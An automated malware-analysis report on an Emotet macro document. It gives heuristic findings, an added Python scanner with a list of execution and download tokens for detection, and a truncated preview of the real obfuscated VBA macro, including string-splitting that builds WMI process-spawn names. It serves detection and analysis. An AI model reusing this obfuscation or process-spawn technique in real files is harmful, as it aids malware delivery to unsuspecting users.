Verdict: MALICIOUS
Risk Score: 222
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1059 Command and Scripting Interpreter
The sample contains VBA macros, including an AutoOpen macro, the usual execution vector for Emotet maldocs: the code runs as soon as the document is opened and macros are enabled. The macro also calls GetObject, and the extracted source assembles the strings "winmgmts:Win32_Process" and "winmgmts:Win32_ProcessStartup" from split literals (for example "winm" + "gmts:Win32" + ... + "_Process"), which is consistent with GetObject being used to reach the WMI Win32_Process class and spawn a child process that is not a child of Word. ClamAV names the family explicitly (Doc.Malware.Emotet-6866090-1). Most of the visible code is junk padding (Select Case blocks over never-assigned variables with arbitrary arithmetic) that exists to defeat signature and heuristic scanning; the obfuscated script most likely downloads and executes a second-stage payload, but no URL reachable from the macro was recovered (the only extracted URL is the schema namespace in the document body).
Heuristics (7)

- ClamAV: Doc.Malware.Emotet-6866090-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Emotet-6866090-1
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body)
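The findings above are token matches over the decoded macro source. What follows is an added example, not part of this report and not oletools code, of the same kind of scan written in Python: it flags auto-exec entry points, GetObject and other execution tokens, and, because Emotet splits its strings (the preview's "winm" + "gmts:Win32" + ... + "_Process"), it also folds the string literals on each statement back together so the WMI class names surface. The sample macro is constructed: its two string-assembly lines are copied from the preview, while the GetObject call and the AutoOpen procedure are assumed (the preview is truncated before they would appear). The rule ID OLE_VBA_EXEC_TOKEN is made up for this example; OLE_VBA_AUTOOPEN and OLE_VBA_GETOBJ are the report's own.

```python
"""Token scan of decoded VBA source with split-literal folding.

Added example, not part of the analyzer report or of oletools.
"""
import re

# Entry points Office runs without user interaction (Word and Excel names).
AUTOEXEC_TOKENS = {"autoopen", "document_open", "autoexec", "autoclose",
                   "workbook_open", "auto_open"}

# Object-creation, process-execution and download tokens.  The WMI tokens
# have no trailing \b so that "Win32_ProcessStartup" also matches.
EXEC_PATTERNS = {
    "GetObject": r"\bGetObject\b",
    "CreateObject": r"\bCreateObject\b",
    "Shell": r"\bShell\b",
    "WScript.Shell": r"\bWScript\.Shell\b",
    "winmgmts:": r"\bwinmgmts:",
    "Win32_Process": r"\bWin32_Process",
    "URLDownloadToFile": r"\bURLDownloadToFile\b",
}

STRING_LITERAL = re.compile(r'"((?:[^"]|"")*)"')
URL_RE = re.compile(r"https?://[^\s\"']+", re.I)
PROC_DEF = re.compile(r"^(?:Public\s+|Private\s+)?(?:Sub|Function)\s+(\w+)", re.I)


def fold_literals(line: str) -> str:
    """Join every string literal on one VBA statement, dropping the
    variables and operators between them, and unescape doubled quotes.
    '"winm" + "gmts:Win32" + x + "_Process"' folds to 'winmgmts:Win32_Process'."""
    return "".join(s.replace('""', '"') for s in STRING_LITERAL.findall(line))


def scan_vba(source: str) -> dict:
    """Scan decoded VBA source.  Returns findings shaped like the report's
    (severity, rule_id, line_number, evidence), the reassembled strings,
    any URLs found in them, and a verdict that mirrors the report's
    'auto-exec token together with execution tokens' rule."""
    findings, folded_strings, urls = [], [], []
    for lineno, raw in enumerate(source.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("'"):
            continue  # blank line or VBA comment
        m = PROC_DEF.match(line)
        if m and m.group(1).lower() in AUTOEXEC_TOKENS:
            findings.append(("high", "OLE_VBA_AUTOOPEN", lineno, line))
        folded = fold_literals(line)
        if len(STRING_LITERAL.findall(line)) > 1:
            folded_strings.append((lineno, folded))  # a split-literal string
        urls.extend((lineno, u) for u in URL_RE.findall(folded))
        # Match against the raw statement (calls such as GetObject) and
        # against the folded literals (names the obfuscator split apart).
        for name, pat in EXEC_PATTERNS.items():
            if re.search(pat, line, re.I) or re.search(pat, folded, re.I):
                # OLE_VBA_EXEC_TOKEN is a made-up rule id for this example.
                rule = "OLE_VBA_GETOBJ" if name == "GetObject" else "OLE_VBA_EXEC_TOKEN"
                findings.append(("high", rule, lineno, name))
    has_auto = any(f[1] == "OLE_VBA_AUTOOPEN" for f in findings)
    has_exec = any(f[1] in ("OLE_VBA_GETOBJ", "OLE_VBA_EXEC_TOKEN") for f in findings)
    if has_auto and has_exec:
        verdict = "malicious"  # runs on open and can execute something
    elif has_auto or has_exec:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"findings": findings, "folded_strings": folded_strings,
            "urls": urls, "verdict": verdict}


# Constructed sample: lines 4 and 5 are copied from the report's preview;
# the GetObject call and the AutoOpen procedure are assumed, because the
# preview is truncated before the analyzer's flagged statements appear.
SAMPLE_VBA = '''Attribute VB_Name = "O7_501"
Function G_69_27(J299_7, Y635_434)
On Error Resume Next
Y14035__ = F978__26 + "winm" + "gmts:Win32" + c__9__ + "_ProcessStartup" + a1_7_3
n217_88_ = C8742_ + "winm" + "gmts:Win32" + a326_5 + "_Process" + V2_33_
Set w_1 = GetObject(n217_88_)
End Function
Sub AutoOpen()
G_69_27 1, 2
End Sub
'''

if __name__ == "__main__":
    result = scan_vba(SAMPLE_VBA)
    for finding in result["findings"]:
        print(finding)
    print("reassembled:", result["folded_strings"])
    print("verdict:", result["verdict"])
```

Running it on the real macros.bas works the same way: read the file, pass its text to scan_vba, and look at folded_strings for the reassembled strings. Folding every literal on a statement is deliberately coarse: it ignores the variables between fragments, so it shows what the code builds when those are empty or undefined; treat the result as a lead to confirm under a debugger or sandbox, not as proof of the runtime string.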
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 52620 bytes | cb0fdac6aece3c0137d582fdb8fcdbbd9ed2540e272f749bfdd59b7d9ba9e5f7 |

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "W1635_"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "O7_501"
Function s765620()
Select Case u1_89_23
Case 160246792
Set h48____6 = h_05395
u8675___ = (W83__8_0 * Fix(234350919 / CBool(o06744))) - W2__76 / Oct(319357687) / 271696161 + CStr(K3_784) - 888302097 + ChrB(k_5_2_62)
Set z2780_ = j0604271
End Select
Select Case r912_6
Case 158677672
Set P587452 = X85719_4
Q06_72 = (S0_7_1_8 * Fix(859621107 / CBool(S407__5))) - c740__4 / Oct(870129185) / 945955234 + CStr(T76___) - 971375096 + ChrB(f7__04)
Set L8_2366 = M0___94
End Select
Select Case o91731
Case 782427697
Set Y__268 = Z213_59_
t4383_ = (L503__6 * Fix(199271678 / CBool(i1_4585))) - s_4784 / Oct(753628073) / 912117764 + CStr(w920_563) - 305568187 + ChrB(p_735_)
Set v934_80 = I_2195__
End Select
Select Case m595__
Case 528259646
Set i97_7_66 = l2_3802
a_1__216 = (Q763__ * Fix(432367320 / CBool(f79_9___))) - E0_407 / Oct(859595374) / 593590436 + CStr(s75347_) - 302996776 + ChrB(L286_6_1)
Set B4143763 = G699_326
End Select
Select Case b60_3_92
Case 143929562
Set h52_79 = a7_34724
D372_87_ = (A3_431_ * Fix(258734385 / CBool(P95297_))) - N183410 / Oct(828439098) / 565414746 + CStr(Q92__5_) - 505583947 + ChrB(l_6197)
Set Y8_4736 = Z3843_
End Select
Select Case c65981_9
Case 217872022
Set u_9__8_ = a4_1_64
T_9592 = (c__91_09 * Fix(596078557 / CBool(q308_8))) - Z4_3_7 / Oct(296944862) / 835316730 + CStr(d476___9) - 15985132 + ChrB(O75729)
Set V__6_10_ = J_20_1
End Select
End Function
Function G_69_27(J299_7, Y635_434)
On Error Resume Next
Select Case u0_820_
Case 294867888
Set c95678 = k76_73
z_7171 = (D8__584 * Fix(576463981 / CBool(p0__69))) - I73_3_4 / Oct(39064809) / 699421162 + CStr(K_8__6_0) - 22500428 + ChrB(J_9660)
Set V_8__4 = P204_4
End Select
Select Case z32_716
Case 670178782
Set q_39_8 = a1__28
O2_572_9 = (q4629306 * Fix(928575838 / CBool(X0_16_3))) - C880_4 / Oct(732953934) / 28549489 + CStr(s80__6_7) - 436627059 + ChrB(j972_7)
Set F2010_ = k567993_
End Select
Select Case G8_0___
Case 939385155
Set w04_4_4 = H_37_02
z2800_ = (j733200_ * Fix(729308679 / CBool(Y_548__9))) - I1089_ / Oct(442472212) / 972760792 + CStr(b_52_0) - 368078383 + ChrB(X0__4_)
Set u10_2__ = b9704_7
End Select
Y14035__ = F978__26 + "winm" + "gmts:Win32" + c__9__ + "_ProcessStartup" + a1_7_3
Select Case o__4_4
Case 303915704
Set W52_12 = P5_88_
l30_393 = (o_907_ * Fix(1315883 / CBool(s__1077_))) - L04_7_31 / Oct(617563525) / 532130956 + CStr(H_042_9_) - 385896287 + ChrB(m_080745)
Set a_9823 = u61_10
End Select
Select Case j619__
Case 845215775
Set u_02878_ = f30041_
F791_26 = (N_60355 * Fix(586235552 / CBool(n8488832))) - o9396045 / Oct(727942512) / 939962304 + CStr(z_811_) - 983037978 + ChrB(j217___)
Set b_5__00 = a21_10
End Select
Select Case a894__65
Case 436794220
Set T447_5_2 = Q2__883
c_393221 = (G8_55__ * Fix(949913307 / CBool(w4_6536))) - R5418__ / Oct(162872676) / 636521854 + CStr(p4378_8) - 792982796 + ChrB(l84__4)
Set M__5855_ = c583_9
End Select
n217_88_ = C8742_ + "winm" + "gmts:Win32" + a326_5 + "_Process" + V2_33_
Select Case h__5837_
Case 115771919
Set j5_9327 = k6_76_67
f0748__ = (D_13___ * Fix(424639074 / CBool(G251_34))) - v9__78 / Oct(453556423) / 719143305 + CStr(N_4_15) - 702454277 + ChrB(u908__)
Set Q0724_8 = M1998285
End Select
Select Case V8_7__0
Case 299880958
Set c68_7_ = O4937_
R_5273_0 = (A_5479 * Fix(222904223 / CBool(D86555))) - r_4132 / Oct(46293275) / 619175103 + CStr(B950_36_) - 915521942 + ChrB(n___94)
Set j1_8___5 = m59_03__
End Select
Select Case E9966941
Case 829374279
Set t_2275__ = T_0_316
j437_694 = (i1_4477 * Fix(282408140 / CBool(D6443__
... (truncated)